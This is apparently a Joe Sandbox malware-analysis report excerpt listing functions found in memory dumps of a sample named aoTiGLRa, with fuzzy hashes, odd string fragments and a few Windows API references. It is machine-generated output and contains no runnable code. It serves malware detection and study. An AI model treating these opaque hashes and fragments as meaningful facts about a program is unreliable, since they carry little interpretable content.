Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID: (oq$Hq
API String ID: 0-2917151738
Opcode ID: a49580ba4520b8760570d28a4e4ae25a716cd23b0c31d6013a076d52891f4ac9
Instruction ID: e5a28805cc99ec6b30d754198606d5e330ef5d308feb5869a1d28ae1cc2189ac
Opcode Fuzzy Hash: a49580ba4520b8760570d28a4e4ae25a716cd23b0c31d6013a076d52891f4ac9
Instruction Fuzzy Hash: EC126B70A102199FDB14DFA9D855BAEBBB6FF88300F548169E805EB351DF30AD85CB90

Function 015A81D0 Relevance: 2.7, Strings: 2, Instructions: 182COMMON

Download Yara Rule

Strings

PHq, xrefs: 015A841B
PHq, xrefs: 015A840A

Memory Dump Source

Source File: 00000014.00000002.3697927192.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_15a0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: 7de3b63e3470fded3c0127bc59b70adcd709d65d1e33d9162ad3b3f083bcf019
Instruction ID: 7a76a0edab849eba01fc806abcb824382c413ec696c037d881be3dd524819daa
Opcode Fuzzy Hash: 7de3b63e3470fded3c0127bc59b70adcd709d65d1e33d9162ad3b3f083bcf019
Instruction Fuzzy Hash: 8C81E074E00218CFEB68CFAAC9947ADBBF2BF89301F24846AD419AB354DB345945CF50

Function 01489328 Relevance: 2.0, APIs: 1, Instructions: 531COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3697565710.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1480000_aoTiGLRa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b626856336701cbfba196bcb615c904d8cc6ea6d801a37d280ff9eba1439c723
Instruction ID: bb346053887e65ee1d243b2a64cec5f214382a04fe122fcf2dd5a65d05d44131
Opcode Fuzzy Hash: b626856336701cbfba196bcb615c904d8cc6ea6d801a37d280ff9eba1439c723
Instruction Fuzzy Hash: 0A224D74E00619CFDB14EFA9C984BADBBB2BF84304F1481AAD849AB355DB349D85CF50

Function 015A7B78 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3697927192.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_15a0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8667477a92d110bad648bc27ab7582ce10006c4b7d9a4d6a8cfd800ce557a973
Instruction ID: a686000888012a7afd35ac83552b8dde9cb7e232e61b1d980b944e56d6db5d3a
Opcode Fuzzy Hash: 8667477a92d110bad648bc27ab7582ce10006c4b7d9a4d6a8cfd800ce557a973
Instruction Fuzzy Hash: 65E19074E01218CFEB64DFA9C954B9DBBB2FF89300F2081AAD409AB355DB755A85CF10

Function 015AE548 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3697927192.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_15a0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb4089cc2dbcc3fbe2b482ebfd8c61639c5a47bacb3cb9ff526b9454379aea7e
Instruction ID: 2f2c3be917facf63b6f859f32212cf775ec69abcb365b885dd51659cff733b05
Opcode Fuzzy Hash: fb4089cc2dbcc3fbe2b482ebfd8c61639c5a47bacb3cb9ff526b9454379aea7e
Instruction Fuzzy Hash: 60D18E78E002188FEB55DFA9C994BADBBB2FF89300F5080A9D809AB355DB355D81CF51

Function 015A8FB0 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3697927192.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_15a0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aafe46c8545437efa72927aa8fb65a54c0fe514744a551622762c776b3f67714
Instruction ID: af895fd7c3e70d47ba4ed33f57552e54be730bddaf824bd928e651fa5fd8312d
Opcode Fuzzy Hash: aafe46c8545437efa72927aa8fb65a54c0fe514744a551622762c776b3f67714
Instruction Fuzzy Hash: 36D18D78E002188FEB54DFA9C994BADBBB2FF89300F5090A9D809AB355DB355D81CF51

Function 015A7720 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3697927192.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_15a0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58bf14f5cdb9b4f2df730d057cf0abfc43584963a847b9e8663b1caebea5a6cd
Instruction ID: b8b6a915711ceb9bdaecf9584cb10ec023e6b66ab69e2105699ae40129d49972
Opcode Fuzzy Hash: 58bf14f5cdb9b4f2df730d057cf0abfc43584963a847b9e8663b1caebea5a6cd
Instruction Fuzzy Hash: A6C17E74E00218CFEB54DFA9C994BADBBB2FF89300F5091A9D809AB355DB355A81CF50

Function 032EE988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c41bf45461c1e83c6114441a8a0a44a501159ef2aa8e57e1795438d628665dd8
Instruction ID: 49be5b90d0ca328083e2520004484979014e425ea7cb39075b1a6b56529da12b
Opcode Fuzzy Hash: c41bf45461c1e83c6114441a8a0a44a501159ef2aa8e57e1795438d628665dd8
Instruction Fuzzy Hash: 95519374E10308DFEB18DFAAD494A9DBBB6FF89300F249029E815AB364DB345942CF54

Function 032EE97B Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d334d959d6ae7840e56780c2b816dec2120fed7f22a0cf9057811ddc6b4fe7eb
Instruction ID: 37193e01fb0e2ea5685a60bfa08c57fa96aea77af477515228940e2471cec329
Opcode Fuzzy Hash: d334d959d6ae7840e56780c2b816dec2120fed7f22a0cf9057811ddc6b4fe7eb
Instruction Fuzzy Hash: 7851A574E10308DFDB18DFAAD894A9DBBB2FF89300F249029E815AB365DB345942CF55

Function 015A7B69 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3697927192.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_15a0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95fa57dd5359d3a462ae0c20335795481afd40e9fa940f5f3cb49a5b7ae3b064
Instruction ID: 051cfd5e5d3481fbe41718e8aef6241fc2b4ea7b9067c845686a8bfaf2793a47
Opcode Fuzzy Hash: 95fa57dd5359d3a462ae0c20335795481afd40e9fa940f5f3cb49a5b7ae3b064
Instruction Fuzzy Hash: 6F41C2B4D006088BEB58DFAAC8547DDBBF2BF89300F64C46AC418BB264DB755946CF24

Function 015AE538 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3697927192.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_15a0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bacf19c901ef4bc2b347f89aaa888b80c7ef79d399978e888971089c738447a1
Instruction ID: 3fe78d71e9b1568e5d69ec8be57309e6d0fcca377c47f418f42a541b26478e6b
Opcode Fuzzy Hash: bacf19c901ef4bc2b347f89aaa888b80c7ef79d399978e888971089c738447a1
Instruction Fuzzy Hash: 1841B4B1D002488BEB58DFAAD5456DDBBF2FF89304F20D42AC414AB264DB344946CF50

Function 015A8FA1 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3697927192.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_15a0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a05e9d203cb00b9711822ddb6f116f763fa349659ebd8917bfae0d5dd9b7fd1f
Instruction ID: 9f45b3c7b436c9f835937e0ed8ceff4efaf7956281811bbcd57d240e60a6ef23
Opcode Fuzzy Hash: a05e9d203cb00b9711822ddb6f116f763fa349659ebd8917bfae0d5dd9b7fd1f
Instruction Fuzzy Hash: BD41E374E002588BEB48DFAAD5446DEBBF2BF89304F64D12AC418BB258DB344946CF50

Function 015A7722 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3697927192.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_15a0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eeb5cf8c5afe6292bc43f44f1a7e230e77293ef3692c8203e7be50fcf7070ee3
Instruction ID: cf090cb10862e389d6d017e7e672f9db22c91243b55321a50b870c5793c2f27d
Opcode Fuzzy Hash: eeb5cf8c5afe6292bc43f44f1a7e230e77293ef3692c8203e7be50fcf7070ee3
Instruction Fuzzy Hash: 1231C3B0D012088BEB18DFAAD5446DDBBF2BF89300F20D12AC414BB258DB355945CF50

Function 032E76F1 Relevance: 10.5, Strings: 8, Instructions: 470
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,q, xrefs: 032E7BA0
(oq, xrefs: 032E7815
,q, xrefs: 032E7B90
(oq, xrefs: 032E77E9
(oq, xrefs: 032E7C0F
(oq, xrefs: 032E7BFF
(oq, xrefs: 032E78B2
(oq, xrefs: 032E772E

Memory Dump Source

Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq$(oq$(oq$(oq$,q$,q
API String ID: 0-2212926057
Opcode ID: 46fe35af65e9dd7828cfd2317eec88226143d3104dcd894830e9e530f3f09dcd
Instruction ID: c3302f27641b444b7ff373f2eaf0cacc6f764a2f6a44929db409f3933861a858
Opcode Fuzzy Hash: 46fe35af65e9dd7828cfd2317eec88226143d3104dcd894830e9e530f3f09dcd
Instruction Fuzzy Hash: 3C126A34A1020A9FCB24CF68D985AAEBBF6FF48314F588599E855DB361D730ED81CB50

Function 032E5F38 Relevance: 2.8, Strings: 2, Instructions: 266COMMON

Download Yara Rule

Strings

Hq, xrefs: 032E6023
Hq, xrefs: 032E6056

Memory Dump Source

Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID: Hq$Hq
API String ID: 0-925789375
Opcode ID: 54688a9bbdb884ac718aa6283e2f0a8897dff9e005eb2b84e708dced27aecc17
Instruction ID: c04a1961f6820f89340c6383c0f5eefe3415fbceece591f944d731b2f7038560
Opcode Fuzzy Hash: 54688a9bbdb884ac718aa6283e2f0a8897dff9e005eb2b84e708dced27aecc17
Instruction Fuzzy Hash: 3391DC343242118FDB169F24D856B6E7BA6BF89305F588469E846CB391CF34DC82C791

Function 032E6498 Relevance: 2.7, Strings: 2, Instructions: 229COMMON

Download Yara Rule

Strings

,q, xrefs: 032E656E
,q, xrefs: 032E6578

Memory Dump Source

Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID: ,q$,q
API String ID: 0-1667412543
Opcode ID: 75bd3882797e57b51b9f5cf8eae99d2ad83c07931a594800c67890b3df484c74
Instruction ID: c4476bd1b7dfb4b7dede20a36d5578d74bdadd6185e309b16f4f54a64a4cea6a
Opcode Fuzzy Hash: 75bd3882797e57b51b9f5cf8eae99d2ad83c07931a594800c67890b3df484c74
Instruction Fuzzy Hash: AD81C134B30506CFCB14CF69C485AA9BBB6FF99310B998069D415DB364CB35E881CB60

Function 015A8A68 Relevance: 2.7, Strings: 2, Instructions: 213COMMON

Download Yara Rule

Strings

(q, xrefs: 015A8C42
(&q, xrefs: 015A8B83

Memory Dump Source

Source File: 00000014.00000002.3697927192.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_15a0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID: (&q$(q
API String ID: 0-2464455664
Opcode ID: 69e077828124cd9bc8e192cb8bed8130947873f0ed1d07aaa2e22b2c68f54714
Instruction ID: 044c8da560f7d89eee72bff5e69f0c604ef3cd9c35bed62fb72decd6ef353d48
Opcode Fuzzy Hash: 69e077828124cd9bc8e192cb8bed8130947873f0ed1d07aaa2e22b2c68f54714
Instruction Fuzzy Hash: DA718D31F003198BDB15DFA9D8506AEBBB2BFC9350F54812AE805AB390DF349D46CB91

Function 032E9C30 Relevance: 2.6, Strings: 2, Instructions: 148COMMON

Download Yara Rule

Strings

4'q, xrefs: 032E9D6D
4'q, xrefs: 032E9D84

Memory Dump Source

Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: f873d18325a4cb7190f732095eb22fa013909295d5b8f62bed2a3f59ad424216
Instruction ID: 13fb82f59d9e0e4a8cdaba8a5dcc8bfaed4c65b3bbcda31dd753cb76954bc807
Opcode Fuzzy Hash: f873d18325a4cb7190f732095eb22fa013909295d5b8f62bed2a3f59ad424216
Instruction Fuzzy Hash: 0251B2707203159FDB00EBA9C845B6EBBEAEB88311F488466E948CB355DB75DC81C7A1

Function 032EAEBB Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

(oq, xrefs: 032EB079
(oq, xrefs: 032EAECD

Memory Dump Source

Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID: (oq$(oq
API String ID: 0-1396055846
Opcode ID: f672a927f2fbbec65536dd48c4137cf6f57d5dec2f89aabfcfe06e1ff3e3017c
Instruction ID: 58acabfcb952ce8f7173b54b9b38e8c2da61e897acdf5671421df03a9873ca7a
Opcode Fuzzy Hash: f672a927f2fbbec65536dd48c4137cf6f57d5dec2f89aabfcfe06e1ff3e3017c
Instruction Fuzzy Hash: 86311331B242059FC704DB78E81676EBBF6EFC9211F584069E906DB390DE31EC418791

Function 032E3CC0 Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

Xq, xrefs: 032E3CCD
Xq, xrefs: 032E3CF6

Memory Dump Source

Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID: Xq$Xq
API String ID: 0-1556399337
Opcode ID: e287c22dc32aa5043686bda26545bd176d4e1fab84d53fe5608326e4addac15e
Instruction ID: 1b04663f54ffc8533a3e02fa1ac911cd8191a2a339508b6e1ae0a74f2756c193
Opcode Fuzzy Hash: e287c22dc32aa5043686bda26545bd176d4e1fab84d53fe5608326e4addac15e
Instruction Fuzzy Hash: 6731CB39B2032547DF28C6BA589637EA5EAEBC4352F5C4079EA07C7380DFB4CC858691

Function 032E8EF8 Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

$q, xrefs: 032E8FD7
$q, xrefs: 032E8FB4

Memory Dump Source

Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
Opcode ID: cc7b30cf04353ae570764f8094759f6b1a4420660a3356be70ba7f0b876c9640
Instruction ID: 0ccfa359b5ecb58cbccd54b409e5ef21810e7824ffef21b720c9e36b9dcb8abc
Opcode Fuzzy Hash: cc7b30cf04353ae570764f8094759f6b1a4420660a3356be70ba7f0b876c9640
Instruction Fuzzy Hash: 6D31A6303342124FDB25CB69C85663EB76BFB84A10BE8449AF496DB392DE74DCC08755

Function 032E0C8F Relevance: 1.8, Strings: 1, Instructions: 543COMMON

Download Yara Rule

Strings

LRq, xrefs: 032E0F19

Memory Dump Source

Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID: LRq
API String ID: 0-3187445251
Opcode ID: 879d6305f48a36dc17fd90ba7ffe420e142cdddfea5a640a692ed38cc9904f5f
Instruction ID: 518266516f3852fa52c5589df6f404172d18e5894fd85652c83d765841adb404
Opcode Fuzzy Hash: 879d6305f48a36dc17fd90ba7ffe420e142cdddfea5a640a692ed38cc9904f5f
Instruction Fuzzy Hash: B352C778A00219CFDB64DF64E984AEDBBB5FB88301F1091A5E809A7354DF746E85CF81

Function 032E0CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON

Download Yara Rule

Strings

LRq, xrefs: 032E0F19

Memory Dump Source

Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID: LRq
API String ID: 0-3187445251
Opcode ID: 559251f36e232c1846a16031ac82b072a29c245501d0b881eb3e3cb9ae224f9f
Instruction ID: 7acdcc7fb8d7d7ea43eae622a3434f924443b5f8066ffb432137704fe20fb864
Opcode Fuzzy Hash: 559251f36e232c1846a16031ac82b072a29c245501d0b881eb3e3cb9ae224f9f
Instruction Fuzzy Hash: 3952B778A00219CFDB64DF64E984AEDBBB5FB88301F1091A5E809A7354DF746E85CF41

Function 0166C824 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0166CB6E,?,?,?,?,?), ref: 0166CC2F

Memory Dump Source

Source File: 00000014.00000002.3698413216.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1660000_aoTiGLRa.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 3e7a80cee86fae17a23aa3872820ee24ac4aac0de85f1a9efebefac17ed390d9
Instruction ID: 4814c02007fe225653b6c2db7a1eb90055f526c1b39484f4c237e4c07e6c06eb
Opcode Fuzzy Hash: 3e7a80cee86fae17a23aa3872820ee24ac4aac0de85f1a9efebefac17ed390d9
Instruction Fuzzy Hash: 1B21E5B5D00248EFDB10CF9AD984ADEBBF8EB48310F14841AE958A7350D379A940CFA5

Function 0166CBA6 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0166CB6E,?,?,?,?,?), ref: 0166CC2F

Memory Dump Source

Source File: 00000014.00000002.3698413216.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1660000_aoTiGLRa.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: dcc63fb8855d11d8d0ec19fb503bfc69834d6a4506690e492354375b899f9ce1
Instruction ID: 54b1b290be53c148a9ff6c30876705868ae3e9c7e0a28a624b446ff68544de9c
Opcode Fuzzy Hash: dcc63fb8855d11d8d0ec19fb503bfc69834d6a4506690e492354375b899f9ce1
Instruction Fuzzy Hash: 6B21E3B5D00248AFDB10CFAAD984ADEBBF8EB48310F14841AE958A7350D378A940CF65

Function 0148992C Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 01489A6E

Memory Dump Source

Source File: 00000014.00000002.3697565710.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1480000_aoTiGLRa.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c2dd4fe50d3fc24ac98230c61b434ada5198743fdd667ff6bb1eec5f44389e84
Instruction ID: a69d16ed0846578e3a2be7ce6d2fab4de35a8573784b76933446f098d856b102
Opcode Fuzzy Hash: c2dd4fe50d3fc24ac98230c61b434ada5198743fdd667ff6bb1eec5f44389e84
Instruction Fuzzy Hash: 6D117C74E0020A9FDB04EFA9D984ABDFBB9FFD8318F148166E804A7256D770A941CB50

Function 032EE007 Relevance: .7, Instructions: 652COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6902a4ba65f60a13f50c2f3b75be4923b2778c596ba1e6ccfaf60932a4d92d52
Instruction ID: 817725343ee1c77af49454443607692e9536e1ae04e8a350b6fcfd15dba71ab5
Opcode Fuzzy Hash: 6902a4ba65f60a13f50c2f3b75be4923b2778c596ba1e6ccfaf60932a4d92d52
Instruction Fuzzy Hash: C11297380352468FE7512B24F2AE12B7F69FB1F3637047C41FA4A88559AF71A449CF22

Function 032EE018 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2cdaa0efb893b00b70b3be40277498a3f5d4daa9405ab8508e6bea59cc69b63
Instruction ID: 88c2b55a6ee6f88470475665f08f57170c47689138c119740b0b088353d55c70
Opcode Fuzzy Hash: e2cdaa0efb893b00b70b3be40277498a3f5d4daa9405ab8508e6bea59cc69b63
Instruction Fuzzy Hash: 4A1287380312478FA7512B24F2AE52B7F69FB1F3637047C41FA5A88559AF71A449CF22

Function 015A9841 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3697927192.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_15a0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c25eb6bbc2d920c028fbe4f923df974eca461b29108bc214ddb347e3ea7e285
Instruction ID: bec7dc2aa3c09d5436f5a2d3042ad79f2acb211475a7dba8df0e8223f5038b08
Opcode Fuzzy Hash: 4c25eb6bbc2d920c028fbe4f923df974eca461b29108bc214ddb347e3ea7e285
Instruction Fuzzy Hash: F6C1CF70A002299FEBA4DF68C954BDDBBB2BB98300F1081EAD90DA7250DB715E85CF51

Function 015A9850 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3697927192.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_15a0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e24caea3144ce7b72eb8545a496785c23fd49cfd6d7617e58f35ef4c1ca4f9b4
Instruction ID: 467c3de743bd4783e9a721879351017346f94cea3b23ccf33bfd54dd0cf60a55
Opcode Fuzzy Hash: e24caea3144ce7b72eb8545a496785c23fd49cfd6d7617e58f35ef4c1ca4f9b4
Instruction Fuzzy Hash: 95B1B074E0022A9FEB64DF69C954BDDBBB2BB88300F1081EAD90DA7250DB745E84CF51

Function 032E9A10 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2b432041f97ca6aaefa7987a8c23c6a883a75857bfa885b1f8c7f6e1d2c719c
Instruction ID: 918918b7c61ef13f38efce1479ad69673d042a24edeb3b64697f2eec0a45d86d
Opcode Fuzzy Hash: a2b432041f97ca6aaefa7987a8c23c6a883a75857bfa885b1f8c7f6e1d2c719c
Instruction Fuzzy Hash: 878116319106069FC711CF2CC8856AAFBBAEF85324B58C26BD8589B351D735F8D1CBA0

Function 032E80D8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ac8063cfb8e01e53df2af0c06f0cdf6f12d60ae9ef4732952157d40b9e6105c
Instruction ID: 524f491e9c86a111a8a64160b81360135b3d05f2ed437a189fb281ad3c2a8302
Opcode Fuzzy Hash: 0ac8063cfb8e01e53df2af0c06f0cdf6f12d60ae9ef4732952157d40b9e6105c
Instruction Fuzzy Hash: BA716D347206468FCB14DF68C895A6E7BE5BF8AA05F5900A9E845DB3B0DB70DC81CB51

Function 015A94E2 Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3697927192.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_15a0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2c3ace47a67f74b14ac0ec3da5803c60deeb25fc1273518a77da2af143ac23f
Instruction ID: 304e29d3b9d55979323effb3942849eb947f18d1e000b9f7ecf1ce359172c00f
Opcode Fuzzy Hash: b2c3ace47a67f74b14ac0ec3da5803c60deeb25fc1273518a77da2af143ac23f
Instruction Fuzzy Hash: AA611374E402199FEB04DFE9D944B9DBBF6BF98310F54C029E848AB369EA309941CF50

Function 015A94F0 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3697927192.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_15a0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbf7e7fab6497f7709358ff503eee1281db44efa4aad7b9a17a78ec6b3812f4c
Instruction ID: 7fc64089505b144103e6c84aef77cfdbd579eb92c49670c1991298ef3a430d0a
Opcode Fuzzy Hash: cbf7e7fab6497f7709358ff503eee1281db44efa4aad7b9a17a78ec6b3812f4c
Instruction Fuzzy Hash: 48610474E402199FDB04DFA9D944B9DBBF6BF98300F54C029E848AB359DA309941CF51

Function 032EF71F Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cf0edd50b61d028339691116e3c3349a0baaf7f1aab52cc4e1e9aa31b6ef9b7
Instruction ID: 354736ca881e75709f66e5444068fb1117fd4f86505df474ded0ea35126a61e6
